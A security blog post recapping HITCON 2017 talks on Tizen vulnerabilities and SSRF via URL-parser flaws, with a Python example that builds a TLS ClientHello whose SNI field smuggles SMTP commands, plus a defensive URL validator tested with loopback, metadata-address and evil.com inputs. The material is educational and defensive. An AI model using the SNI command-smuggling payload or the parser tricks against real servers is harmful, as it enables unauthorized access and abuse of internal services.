Some of our Troopers had the chance to visit the HITCON conference in Taiwan this year. There are two main events: HITCON Pacific, which is aimed more at corporate attendees, and HITCON CMT, the community edition, which targets students and the general infosec community. HITCON is the biggest security conference in Taiwan.
The venue was the Academia Sinica, one of the most important academic institutions in the Republic of China, founded in 1928 to promote and undertake scholarly research in the sciences and humanities. The conference had three regular tracks plus one special track that was open to the public for demos, presentations and discussions.
You can find more information about the conference and the agenda right here: https://hitcon.org/2017/CMT/agenda.
For this edition of HITCON, offensive talks, specifically about Android security, were in focus. We will sum up two of the most impressive talks in this post.
Breaking Tizen by Amihai Neiderman
Tizen is Samsung's Linux-based operating system for all kinds of IoT devices, including smartphones; its look and feel is similar to Android. Samsung is pushing the operating system to plenty of devices in many countries, especially smartphones. Applications can be developed in native code or based on HTML5. Notable is the remote test lab available to developers: you push your code to the lab, it runs on a physical Tizen device there, and you interact with that device remotely.
The researcher found a large number of vulnerabilities in Tizen's app components, including the TizenStore, the Samsung Cloud app and the Samsung mobile browser. Most of the findings stem from missing or incorrect bounds checks in native code, resulting in classic memory corruption. This is especially critical for highly privileged apps like the TizenStore, which is also present on every device.
In the TizenStore, the researcher found not only memory corruption but also plaintext communication between the app and its backend. The app contained logic that decided which tasks needed an encrypted connection; whenever that logic decided encryption was unnecessary, the data went out in plaintext. The fix removed this decision logic entirely and the function now simply returns "1", so every connection is encrypted, which should be the default in any modern system anyway.
Reporting the vulnerabilities was difficult, the researcher told the audience: it took a while to find the right contact person, and a while longer until Samsung was willing to fix some of the bugs.
Tizen seems to be a classic example of how a product fails at security because it has to be pushed to market fast and security is neglected as a result. This is especially common with IoT products and is by no means a problem of Tizen alone.
A New Era of SSRF – Exploiting URL Parser in Trending Programming Languages! by 蔡政達 (Orange Tsai)
This talk focused on Server-Side Request Forgery (SSRF), a technique to attack services by abusing a web application that parses an attacker-supplied URL and then uses it in its own logic, typically by fetching it. An attacker can use this to reach internal applications or to get around host whitelists.
The researcher started with protocol smuggling. He managed to attack non-HTTP, text-based protocol services through HTTPS requests by abusing SNI, the TLS extension that carries the requested server name in the ClientHello. The SNI value is sent before any encryption is negotiated, so whatever the client puts there reaches the target in plaintext. By injecting line breaks into the SNI host name he got an SMTP server to read the injected lines as commands.
The core problem with SSRF defenses is that URL parsing is not that easy. Developers are normally told to rely on libraries that do the job securely and efficiently, but the researcher showed that even common libraries have severe problems when it comes to URL parsing. He evaluated common implementations such as Python's httplib and Java's java.net.URL; all of them had issues either with CRLF injection or in the URL parsing itself.
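To make the SNI trick concrete, the following added example (our own illustration, not code from the talk) builds a TLS ClientHello by hand with a server name that contains CRLF-delimited SMTP commands, parses the server name back out of the unencrypted bytes, and then shows what a line-oriented server reading that same byte stream sees. The host names, addresses and cipher-suite choice are constructed for the example. In the talk the line breaks reached the SNI field through the host part of an https:// URL handed to a vulnerable URL parser and HTTP client; here the ClientHello is assembled directly so that the example runs offline.

```python
import struct
from typing import List, Optional

# Constructed server name: a plausible host followed by CRLF-delimited SMTP
# commands. Everything after the first CRLF is what a line-based server will
# treat as separate commands.
INJECTED_NAME = (
    b"mail.example.internal\r\n"
    b"HELO attacker.example\r\n"
    b"MAIL FROM:<a@attacker.example>\r\n"
    b"RCPT TO:<victim@example.internal>\r\n"
    b"DATA\r\n"
    b"Subject: smuggled via SNI\r\n"
    b"\r\n"
    b"hello\r\n"
    b".\r\n"
    b"QUIT\r\n"
)


def sni_extension(server_name: bytes) -> bytes:
    """RFC 6066 server_name extension: type 0, ServerNameList with one host_name entry."""
    entry = b"\x00" + struct.pack("!H", len(server_name)) + server_name  # name_type = host_name
    name_list = struct.pack("!H", len(entry)) + entry
    return struct.pack("!HH", 0x0000, len(name_list)) + name_list


def build_client_hello(server_name: bytes, client_random: bytes = b"\x11" * 32) -> bytes:
    """Minimal TLS 1.2 ClientHello record carrying only an SNI extension.
    The two cipher suite identifiers are real (TLS_AES_128_GCM_SHA256 and
    TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256) but chosen arbitrarily for the example."""
    cipher_suites = struct.pack("!HH", 0x1301, 0xC02F)
    extensions = sni_extension(server_name)
    body = (
        b"\x03\x03"                                             # client_version: TLS 1.2
        + client_random                                         # 32-byte random (fixed here)
        + b"\x00"                                               # session_id: empty
        + struct.pack("!H", len(cipher_suites)) + cipher_suites
        + b"\x01\x00"                                           # compression_methods: null only
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake  # ContentType handshake


def extract_sni(record: bytes) -> Optional[bytes]:
    """Walk the ClientHello and return the server_name. No key is needed:
    this whole message is sent before any encryption is negotiated."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    p = 5 + 4                                                   # record header + handshake header
    p += 2 + 32                                                 # client_version + random
    p += 1 + record[p]                                          # session_id
    p += 2 + struct.unpack("!H", record[p:p + 2])[0]            # cipher_suites
    p += 1 + record[p]                                          # compression_methods
    ext_end = p + 2 + struct.unpack("!H", record[p:p + 2])[0]
    p += 2
    while p < ext_end:
        etype, elen = struct.unpack("!HH", record[p:p + 4])
        p += 4
        if etype == 0x0000:                                     # server_name
            # skip ServerNameList length (2) and name_type (1), read HostName length (2)
            nlen = struct.unpack("!H", record[p + 3:p + 5])[0]
            return record[p + 5:p + 5 + nlen]
        p += elen
    return None


def lines_as_seen_by_text_server(data: bytes) -> List[bytes]:
    """A line-oriented service such as SMTP reads up to each CRLF. The binary
    prefix of the ClientHello becomes one unrecognised command that the server
    rejects with a 5xx reply; the injected lines are then processed one by one."""
    return data.split(b"\r\n")


if __name__ == "__main__":
    record = build_client_hello(INJECTED_NAME)
    print("SNI recovered from the clear-text bytes:", extract_sni(record) == INJECTED_NAME)
    for line in lines_as_seen_by_text_server(record)[1:]:
        print("SMTP server reads:", line)
```

Real SMTP servers differ in how they react to the binary prefix, but the point stands regardless: the bytes placed in the SNI field arrive unmodified and unencrypted, so any CR/LF a URL parser lets through into the host name ends up on the wire exactly like this. The defense is to reject control characters in the host name before it reaches the TLS stack, not to trust that "it is HTTPS, so it is encrypted".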
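As an added example (ours, not code from the talk), here is the shape of an outbound-URL check that takes the points from the SSRF introduction and from the parser findings above into account: because parsers disagree about where the host ends and recent Python versions silently strip CR, LF and TAB during parsing, the raw string is checked for control characters and userinfo before it is parsed; the host is canonicalised so that the shorthand forms the C library's inet_aton tolerates (127.1, 0x7f000001, 2130706433) cannot slip past the address check; and every resolved address is checked against non-public ranges. It goes beyond the talk's own examples in also handling IPv4-mapped IPv6 literals and multi-address DNS answers. The host names and the lookup table are constructed so the example runs offline; fake_resolve stands in for socket.getaddrinfo.

```python
import ipaddress
import socket
from typing import Callable, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed lookup table so the example runs offline. In real code pass a
# resolver built on socket.getaddrinfo, and connect to the address you checked
# rather than to the name, otherwise DNS rebinding can swap the answer under you.
FAKE_DNS = {
    "api.example.com": ["93.184.216.34"],
    "internal.example.com": ["10.0.0.5"],
    "rebind.example.com": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolve(host: str) -> List[str]:
    if host not in FAKE_DNS:
        raise ValueError(f"unresolvable host: {host}")
    return FAKE_DNS[host]


def canonical_ip(host: str) -> Optional[ipaddress._BaseAddress]:
    """Return the address if `host` is an IP literal, else None.
    ipaddress only accepts dotted quads, but inet_aton (which many HTTP clients
    end up calling) also accepts 127.1, 0x7f000001 and 2130706433, so those are
    canonicalised here instead of being passed on as if they were host names."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return ipaddress.ip_address(packed)


def is_public(ip: ipaddress._BaseAddress) -> bool:
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                    # ::ffff:127.0.0.1 is still loopback
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_outbound_url(url: str,
                          resolve: Callable[[str], List[str]] = fake_resolve) -> Tuple[bool, str]:
    """Return (allowed, reason). The raw string is checked first because
    urlsplit strips \\r, \\n and \\t silently in recent Python versions and other
    parsers disagree about where the host part ends."""
    if any(ord(c) < 0x21 or ord(c) == 0x7F for c in url):
        return False, "control or whitespace character in URL"
    try:
        parts = urlsplit(url)
        parts.port                              # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparsable URL: {exc}"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    if "@" in parts.netloc:
        return False, "userinfo in URL is not allowed"
    host = parts.hostname
    if not host:
        return False, "empty host"
    literal = canonical_ip(host)
    if literal is not None:
        addresses = [literal]
    else:
        try:
            addresses = [ipaddress.ip_address(a) for a in resolve(host)]
        except ValueError as exc:
            return False, str(exc)
    for ip in addresses:                        # every answer must be public, not just the first
        if not is_public(ip):
            return False, f"{host} resolves to non-public address {ip}"
    return True, f"{host} -> {', '.join(str(a) for a in addresses)}"


if __name__ == "__main__":
    for candidate in ("https://api.example.com/v1", "http://127.1/",
                      "http://[::ffff:169.254.169.254]/", "http://rebind.example.com/",
                      "http://foo@evil.com:80@api.example.com/"):
        print(candidate, "->", validate_outbound_url(candidate))
```

The check is deliberately strict rather than clever: it refuses anything a parser might interpret differently (whitespace, control characters, userinfo) instead of trying to predict which of the talk's parser quirks the HTTP client in use has. Whether a literal like 0x7f000001 is accepted by inet_aton depends on the platform's C library; on glibc, musl and the BSDs it is.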
The talk finished with some demos and case studies that showed once again that complexity kills and that parsing URLs is not a trivial job.